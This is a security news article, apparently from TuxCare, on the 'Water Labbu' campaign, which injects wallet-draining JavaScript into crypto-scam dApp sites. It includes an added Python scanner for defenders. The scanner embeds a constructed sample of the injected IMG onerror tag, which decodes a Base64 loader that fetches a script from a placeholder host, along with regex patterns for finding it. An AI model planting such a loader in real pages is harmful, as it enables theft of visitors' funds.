
Hackers compromise scam sites to redirect crypto transactions

October 18, 2022 - TuxCare PR Team

According to Trend Micro researchers, a threat actor identified as ‘Water Labbu’ is hacking into cryptocurrency scam sites to inject malicious JavaScript, with the aim of stealing money from the scammers’ own victims.

It is important to note that ‘dApps’ (decentralized applications) are used for liquidity mining. Liquidity mining means that investors lend their cryptocurrencies to a decentralized exchange in exchange for high returns generated via trading fees.

But fraudsters have developed scam versions of ‘dApps’, which impersonate cryptocurrency liquidity mining services to steal victims’ cryptocurrency investments.

As soon as an investor connects a wallet to the dApp, Water Labbu’s script checks whether it holds a large amount of cryptocurrency and, if so, tries to steal it using several methods.

Water Labbu is already said to have made at least $316,728 in profit from nine identified victims while compromising at least 45 fraudulent websites.

To compromise scam sites, the threat actor locates cryptocurrency scam sites and injects the “dApps” with malicious scripts that blend in with the site’s existing code.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.
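The injection pattern the report describes (an IMG tag whose onerror handler runs a Base64-encoded payload that in turn builds a script element pointing at a delivery server) can be hunted for in saved page copies. The scanner below is an added example for this article, not code from Trend Micro or the attacker; the sample page, the payload and the delivery host are constructed placeholders, not the real Water Labbu artefacts.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed sample: one benign <img> and one injected in the reported style.
PAYLOAD = ("var s=document.createElement('script');"
           "s.src='https://delivery.example.invalid/x.js';"  # placeholder host
           "document.head.appendChild(s);")
SAMPLE_HTML = (
    "<html><body><img src='/logo.png' alt='logo'>"
    "<img src='x' onerror=\"eval(atob('"
    + base64.b64encode(PAYLOAD.encode()).decode() + "'))\"></body></html>"
)

B64_RE = re.compile(r"atob\(['\"]([A-Za-z0-9+/=]+)['\"]\)")
LOADER_RE = re.compile(r"createElement\(['\"]script['\"]\)")
SRC_RE = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]")


class OnerrorCollector(HTMLParser):
    """Collects the onerror handler of every <img> in the document."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        for name, value in attrs:
            if name.lower() == "onerror" and value:
                self.handlers.append(value)


def decode_payload(handler):
    """Return the Base64-decoded text inside atob('...'), or None if absent/invalid."""
    m = B64_RE.search(handler)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def find_injected_loaders(html):
    """Flag img onerror handlers whose (decoded) body creates a <script> element.
    Returns a list of (raw_handler, external_src_or_None)."""
    p = OnerrorCollector()
    p.feed(html)
    findings = []
    for h in p.handlers:
        body = decode_payload(h) or h  # also catch non-encoded variants
        if LOADER_RE.search(body):
            m = SRC_RE.search(body)
            findings.append((h, m.group(1) if m else None))
    return findings
```

Run it over archived copies of pages you control or monitor; any hit gives the handler and the loader URL to compare against your own deployed assets.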

Once a wallet’s balance is above 0.005 ETH or 22,000 USDT, the target becomes valid for Water Labbu, and the script then determines whether the victim is using Windows or a mobile OS (Android, iOS). If the victim is on a mobile device, Water Labbu’s malicious script sends a transaction authorization request via the dApp website, making it look as if it came from the scam website.

If the recipient approves the transaction, the malicious script empties the wallet of available funds and sends them to an address controlled by Water Labbu.

The sources for this piece include an article in BleepingComputer.
